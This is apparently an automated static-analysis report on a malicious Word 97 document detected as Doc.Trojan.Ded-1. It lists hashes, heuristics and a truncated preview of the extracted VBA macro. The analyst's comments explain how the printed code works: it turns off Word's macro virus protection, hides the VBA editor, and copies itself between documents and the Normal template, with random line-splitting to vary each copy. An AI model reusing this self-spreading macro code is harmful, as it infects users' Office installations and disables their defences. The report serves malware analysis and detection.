Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ea7077056895add…

MALICIOUS

Office (OLE)

34.0 KB Created: 2001-09-04 11:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4383a6ddae3f87448b37db08c27d6913 SHA-1: e72200c7a09ac35029e145cda1ef54af7cf0dc1b SHA-256: 1ea7077056895addbd13695cf33cc54cba7584e976d3ab8c80010350708ceee5
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

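The sample contains VBA macros. The heuristics report a Document_Open auto-exec macro and a Shell() call, which indicates an attempt to execute arbitrary code when the document is opened; neither appears in the portion of the extracted source previewed below, so confirm both against the full macros.bas. The 'Doc.Trojan.Ded-1' ClamAV signature corroborates the malicious verdict. The VBA code is obfuscated with random line continuations, irregular indentation and numeric filler comments. In the previewed Document_Close handler it disables Word's macro virus protection, hides the Visual Basic Editor, and copies its own code between the active document and the Normal template, so it spreads through the global template. This is consistent with malware designed to evade detection and download further stages, although the previewed portion contains no download logic; that part of the assessment presumably rests on the p-code token heuristic and should be verified.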

Heuristics 5

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19446 bytes
SHA-256: c79d528c1825d7436361cbe72405ac825d69aaeb182d315f966ad34688acbbc1
Detection
ClamAV: Doc.Trojan.Ded-1
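Obfuscation or payload: unlikely (automated verdict; it conflicts with the randomized line continuations, indentation and filler comments visible in the preview below, so review the macro manually)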
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
            ' Document_Close: Word event handler in the ThisDocument module; it runs
            ' whenever the document is closed, so no Document_Open is needed to trigger
            ' the code below.
            ' Analyst summary: disables Word's macro virus protection option, then calls
            ' SWL and ABS99, which copy this module's code between the active document
            ' and the Normal template.
            ' Hunting hint: the strings "Options.VirusProtection" and
            ' "VBProject.VBComponents" inside a document macro are strong indicators.
            Private Sub _
Document_Close()

         ' Any runtime error jumps to the label skam just before End Sub, so a
         ' failure (for example blocked VBProject access) is silent to the user.
         On Error GoTo _
skam

    ' Turns off the macro virus protection option in Word's settings.
    Options.VirusProtection _
= False

    ' Normal template -> active document copy (see SWL).
    SWL
'40.13744
          ' Active document -> Normal template copy (see ABS99).
          ABS99
'41.27668
skam:
'58.3359
         End Sub
'91.93771
   ' Empty procedure: the body holds only a filler comment and no statements.
   ' NOTE(review): the name looks like Windows-1251 Cyrillic decoded as Latin-1
   ' (it would read "Идентификатор", i.e. "Identifier") - confirm against the raw
   ' stream. Nothing in the visible listing calls it; its purpose cannot be
   ' determined from here.
   Private Sub Èäåíòèôèêàòîð()
'47.44592
 End Sub
'39.04715
           ' Document_New: Word event handler stub. The body contains no statements,
           ' so nothing executes from this handler in the visible code.
           Private Sub Document_New()
'8.964139
  End Sub
'58.97926
     ' SWL: copies macro code from the Normal template into the active document.
     ' Called from Document_Close. If the active document's first VB component does
     ' not yet contain the text "Document_Close", every non-empty, non-comment line
     ' of the Normal template's first component is passed through e() and inserted
     ' into the document, which is then saved.
     ' Defensive note: this depends on programmatic access to VBProject. Later Office
     ' releases block it unless "Trust access to the VBA project object model" is
     ' enabled, so keep that setting off.
     Private Sub SWL()
'25.46019
              ' Hide the Visual Basic Editor so the user does not see the project.
              Application. _
                                                          ShowVisualBasicEditor = False

     ' Infection check: CodeModule.Find searches lines 1-1000, columns 1-1000,
     ' not whole-word and not case-sensitive. Proceed only when the marker text
     ' is absent from the document.
     If _
Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

             ' Walk every line of the Normal template's first code module.
             For I = _
1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines

            d _
= NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

        ' Skip blank lines, bare continuation lines and lines that start with an
        ' apostrophe, so the numeric filler comments are not carried over here.
        If Len(d) _
> 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

       ' Re-join a statement that was split with a trailing space-underscore:
       ' drop the last character and append the next physical line.
       While _
Mid(d, Len(d) - 1, 2) = " _"

     I = I + 1
'58.45293
  d _
= Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

  Wend
'78.21387
 ' e() is only partly visible in this preview. The visible part trims the line,
 ' swaps the Sub names "Vc()" and "ViewVBCode()", and at random positions
 ' re-splits the line and prepends random spaces. That matches the irregular
 ' layout of this listing and means each copy differs textually.
 d = e(d)
'46.3584
          ' Insert the rewritten line into the document's module at line I * 2.
          ' NOTE(review): why the index is doubled is not evident from the visible code.
          ActiveDocument. _
                               VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

          End If
'80.25874
              Next _
I

  ' Persist the modified document without adding it to the recent files list.
  ActiveDocument. _
                                            SaveAs AddToRecentFiles:=False

          End If
'44.11147
  End _
Sub

' ABS99: copies macro code from the active document into the Normal template.
' Called from Document_Close after SWL; it is SWL with the direction reversed.
' If the Normal template's first VB component does not contain the text
' "Document_Close", each non-empty, non-comment line of the active document's
' first component is passed through e() and inserted into the template, which
' is then saved.
' Triage note: a Normal template whose ThisDocument module contains
' Document_Close together with VBProject/CodeModule calls should be treated as
' infected.
Private Sub ABS99()
'40.16046
      ' Infection check on the global template (same Find arguments as in SWL).
      If _
Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

             ' NOTE(review): f is not defined in the visible part of the listing.
             ' It receives the template's full path; check the complete macros.bas
             ' for what it does with that file.
             f (NormalTemplate. _
FullName)

            ' Walk every line of the active document's first code module.
            For I = 1 To _
ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

 d _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

             ' Skip blank lines, bare continuation lines and comment lines.
             If Len(d) > 0 _
And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

       ' Re-join statements split across physical lines before rewriting them.
       While Mid(d, Len(d) - _
1, 2) = " _"

  I = I _
+ 1

  d = Left(d, Len(d) _
- 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

  Wend
'72.94109
            ' Rewrite the line through e() (random re-splitting and padding in the
            ' visible part of that function) before it is written out.
            d = e(d)
'55.51133
            ' Insert into the Normal template's module at line I * 2.
            NormalTemplate. _
            VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

          End If
'33.90907
    Next _
I

           ' Persist the modified global template to disk.
           NormalTemplate. _
                            Save

     End If
'28.13814
       End Sub
'26.80438
    Private Function e(aString) As _
String

aString = LTrim(aString)
'96.4709
    aString _
= RTrim(aString)

            If aString _
= "Sub " & "Vc()" Then

aString = "Sub " & "ViewVBCode()"
'13.9438
  Else
'42.49291
 If aString _
= "Sub " & "ViewVBCode()" Then

  aString _
= "Sub " & "Vc()"

            End If
'30.66294
      End If
'49.33584
         For I = 1 _
To Len(aString) - 1

              If Mid(aString, _
I, 1) = "." Then

If _
Not Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

  If _
Not Mid(aString, I + 1, 1) = Chr$(34) Then

 e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

     For _
j = 1 To Int(15 * Rnd)

             e = " " & e
'46.8736
        Next j
'80.70413
   Exit Function
'32.68447
         End If
'58.99297
    End If
'58.3927
Else
'38.75368
              If _
Mid(aString, I, 1) = " " And Int(3 * Rnd) = 1 And I > 1 Then

          If Not _
Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

         e = Left(aString, _
I - 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)

            For _
j = 1 To Int(15 * Rnd)

         e = " " & _
e

     Next j
'29.1052
      Exit Function
'76.98775
        End If
'17.76208
 End If
'43.15423
 End _
If

       Next I
... (truncated)